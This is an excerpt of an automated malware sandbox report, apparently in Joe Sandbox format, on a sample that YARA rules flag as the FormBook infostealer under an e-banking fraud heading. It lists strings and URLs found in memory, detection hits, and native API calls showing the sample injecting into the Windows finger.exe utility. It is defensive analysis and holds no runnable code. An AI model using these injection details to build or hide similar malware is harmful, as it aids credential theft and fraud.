                Source: finger.exe, 0000000B.00000002.3138314418.0000000002D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728B
                Source: finger.exe, 0000000B.00000002.3138314418.0000000002D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: finger.exe, 0000000B.00000002.3138314418.0000000002D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: finger.exe, 0000000B.00000003.1971442880.0000000007BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://use.typekit.net/bag0psx.css
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hosttech.ch
                Source: finger.exe, 0000000B.00000002.3141353957.00000000046C0000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0042C743 NtClose,8_2_0042C743
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512B60 NtClose,LdrInitializeThunk,8_2_01512B60
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01512DF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01512C70
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015135C0 NtCreateMutant,LdrInitializeThunk,8_2_015135C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01514340 NtSetContextThread,8_2_01514340
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01514650 NtSuspendThread,8_2_01514650
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512BF0 NtAllocateVirtualMemory,8_2_01512BF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512BE0 NtQueryValueKey,8_2_01512BE0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512B80 NtQueryInformationFile,8_2_01512B80
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512BA0 NtEnumerateValueKey,8_2_01512BA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512AD0 NtReadFile,8_2_01512AD0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512AF0 NtWriteFile,8_2_01512AF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512AB0 NtWaitForSingleObject,8_2_01512AB0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512D10 NtMapViewOfSection,8_2_01512D10
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512D00 NtSetInformationFile,8_2_01512D00
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512D30 NtUnmapViewOfSection,8_2_01512D30
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512DD0 NtDelayExecution,8_2_01512DD0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512DB0 NtEnumerateKey,8_2_01512DB0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512C60 NtCreateKey,8_2_01512C60
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512C00 NtQueryInformationProcess,8_2_01512C00
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512CC0 NtQueryVirtualMemory,8_2_01512CC0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512CF0 NtOpenProcess,8_2_01512CF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512CA0 NtQueryInformationToken,8_2_01512CA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512F60 NtCreateProcessEx,8_2_01512F60
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512F30 NtCreateSection,8_2_01512F30
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512FE0 NtCreateFile,8_2_01512FE0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512F90 NtProtectVirtualMemory,8_2_01512F90
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512FB0 NtResumeThread,8_2_01512FB0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512FA0 NtQuerySection,8_2_01512FA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512E30 NtWriteVirtualMemory,8_2_01512E30
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512EE0 NtQueueApcThread,8_2_01512EE0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512E80 NtReadVirtualMemory,8_2_01512E80
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512EA0 NtAdjustPrivilegesToken,8_2_01512EA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01513010 NtOpenDirectoryObject,8_2_01513010
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01513090 NtSetValueKey,8_2_01513090
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015139B0 NtGetContextThread,8_2_015139B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01513D70 NtOpenThread,8_2_01513D70
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01513D10 NtOpenProcessToken,8_2_01513D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C4340 NtSetContextThread,LdrInitializeThunk,11_2_032C4340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C4650 NtSuspendThread,LdrInitializeThunk,11_2_032C4650
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2B60 NtClose,LdrInitializeThunk,11_2_032C2B60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_032C2BA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2BE0 NtQueryValueKey,LdrInitializeThunk,11_2_032C2BE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_032C2BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2AF0 NtWriteFile,LdrInitializeThunk,11_2_032C2AF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2AD0 NtReadFile,LdrInitializeThunk,11_2_032C2AD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2F30 NtCreateSection,LdrInitializeThunk,11_2_032C2F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2FB0 NtResumeThread,LdrInitializeThunk,11_2_032C2FB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2FE0 NtCreateFile,LdrInitializeThunk,11_2_032C2FE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_032C2E80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2EE0 NtQueueApcThread,LdrInitializeThunk,11_2_032C2EE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_032C2D30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2D10 NtMapViewOfSection,LdrInitializeThunk,11_2_032C2D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_032C2DF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2DD0 NtDelayExecution,LdrInitializeThunk,11_2_032C2DD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2C60 NtCreateKey,LdrInitializeThunk,11_2_032C2C60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_032C2C70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_032C2CA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C35C0 NtCreateMutant,LdrInitializeThunk,11_2_032C35C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C39B0 NtGetContextThread,LdrInitializeThunk,11_2_032C39B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2B80 NtQueryInformationFile,11_2_032C2B80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2AB0 NtWaitForSingleObject,11_2_032C2AB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2F60 NtCreateProcessEx,11_2_032C2F60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2FA0 NtQuerySection,11_2_032C2FA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2F90 NtProtectVirtualMemory,11_2_032C2F90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2E30 NtWriteVirtualMemory,11_2_032C2E30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2EA0 NtAdjustPrivilegesToken,11_2_032C2EA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2D00 NtSetInformationFile,11_2_032C2D00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2DB0 NtEnumerateKey,11_2_032C2DB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2C00 NtQueryInformationProcess,11_2_032C2C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2CF0 NtOpenProcess,11_2_032C2CF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C2CC0 NtQueryVirtualMemory,11_2_032C2CC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C3010 NtOpenDirectoryObject,11_2_032C3010
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C3090 NtSetValueKey,11_2_032C3090
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C3D10 NtOpenProcessToken,11_2_032C3D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032C3D70 NtOpenThread,11_2_032C3D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02959340 NtCreateFile,11_2_02959340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02959630 NtClose,11_2_02959630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02959790 NtAllocateVirtualMemory,11_2_02959790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_029594A0 NtReadFile,11_2_029594A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02959590 NtDeleteFile,11_2_02959590
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 5_2_02483E1C5_2_02483E1C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 5_2_02486F925_2_02486F92
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 5_2_0248DFC45_2_0248DFC4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 5_2_067CDA085_2_067CDA08
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_004186738_2_00418673
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_004100F38_2_004100F3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0040E0FB8_2_0040E0FB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_004168838_2_00416883
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0040E1038_2_0040E103
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_004029C88_2_004029C8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_004021838_2_00402183
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_004021908_2_00402190
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0040E2498_2_0040E249
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0040E2538_2_0040E253
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_004023418_2_00402341
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_004023508_2_00402350
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00402C838_2_00402C83
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0042ED338_2_0042ED33
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0040FED38_2_0040FED3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00402E908_2_00402E90
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015681588_2_01568158
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D01008_2_014D0100
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157A1188_2_0157A118
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015981CC8_2_015981CC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A01AA8_2_015A01AA
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015941A28_2_015941A2
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015720008_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159A3528_2_0159A352
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A03E68_2_015A03E6
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE3F08_2_014EE3F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015802748_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015602C08_2_015602C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E05358_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A05918_2_015A0591
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015924468_2_01592446
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015844208_2_01584420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158E4F68_2_0158E4F6
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015047508_2_01504750
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E07708_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DC7C08_2_014DC7C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FC6E08_2_014FC6E0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F69628_2_014F6962
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A08_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015AA9A68_2_015AA9A6
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EA8408_2_014EA840
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E28408_2_014E2840
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E8F08_2_0150E8F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C68B88_2_014C68B8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159AB408_2_0159AB40
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01596BD78_2_01596BD7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DEA808_2_014DEA80
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157CD1F8_2_0157CD1F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EAD008_2_014EAD00
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DADE08_2_014DADE0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F8DBF8_2_014F8DBF
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0C008_2_014E0C00
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0CF28_2_014D0CF2
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580CB58_2_01580CB5
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01554F408_2_01554F40
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01500F308_2_01500F30
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01582F308_2_01582F30
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01522F288_2_01522F28
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D2FC88_2_014D2FC8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014ECFE08_2_014ECFE0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155EFA08_2_0155EFA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0E598_2_014E0E59
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159EE268_2_0159EE26
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159EEDB8_2_0159EEDB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159CE938_2_0159CE93
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F2E908_2_014F2E90
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015AB16B8_2_015AB16B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0151516C8_2_0151516C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CF1728_2_014CF172
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EB1B08_2_014EB1B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E70C08_2_014E70C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158F0CC8_2_0158F0CC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015970E98_2_015970E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159F0E08_2_0159F0E0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CD34C8_2_014CD34C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159132D8_2_0159132D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0152739A8_2_0152739A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FB2C08_2_014FB2C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015812ED8_2_015812ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E52A08_2_014E52A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015975718_2_01597571
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A95C38_2_015A95C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157D5B08_2_0157D5B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D14608_2_014D1460
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159F43F8_2_0159F43F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D17EC8_2_014D17EC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159F7B08_2_0159F7B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015256308_2_01525630
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015916CC8_2_015916CC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E99508_2_014E9950
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FB9508_2_014FB950
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015759108_2_01575910
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154D8008_2_0154D800
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E38E08_2_014E38E0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159FB768_2_0159FB76
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01555BF08_2_01555BF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0151DBF98_2_0151DBF9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FFB808_2_014FFB80
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159FA498_2_0159FA49
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01597A468_2_01597A46
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01553A6C8_2_01553A6C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158DAC68_2_0158DAC6
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01525AA08_2_01525AA0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157DAAC8_2_0157DAAC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01581AA38_2_01581AA3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01591D5A8_2_01591D5A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E3D408_2_014E3D40
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01597D738_2_01597D73
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FFDC08_2_014FFDC0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01559C328_2_01559C32
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159FCF28_2_0159FCF2
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159FF098_2_0159FF09
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E1F928_2_014E1F92
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159FFB18_2_0159FFB1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E9EB08_2_014E9EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334A35211_2_0334A352
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033503E611_2_033503E6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329E3F011_2_0329E3F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333027411_2_03330274
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033102C011_2_033102C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328010011_2_03280100
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332A11811_2_0332A118
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0331815811_2_03318158
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033441A211_2_033441A2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033501AA11_2_033501AA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_033481CC11_2_033481CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0332200011_2_03322000
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329077011_2_03290770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032B475011_2_032B4750
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328C7C011_2_0328C7C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032AC6E011_2_032AC6E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329053511_2_03290535
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0335059111_2_03350591
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333442011_2_03334420
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334244611_2_03342446
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0333E4F611_2_0333E4F6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334AB4011_2_0334AB40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03346BD711_2_03346BD7
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0328EA8011_2_0328EA80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032A696211_2_032A6962
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032929A011_2_032929A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0335A9A611_2_0335A9A6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329A84011_2_0329A840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329284011_2_03292840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032768B811_2_032768B8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032BE8F011_2_032BE8F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03332F3011_2_03332F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032D2F2811_2_032D2F28
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032B0F3011_2_032B0F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03304F4011_2_03304F40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0330EFA011_2_0330EFA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0329CFE011_2_0329CFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03282FC811_2_03282FC8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0334EE2611_2_0334EE26
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03290E5911_2_03290E59
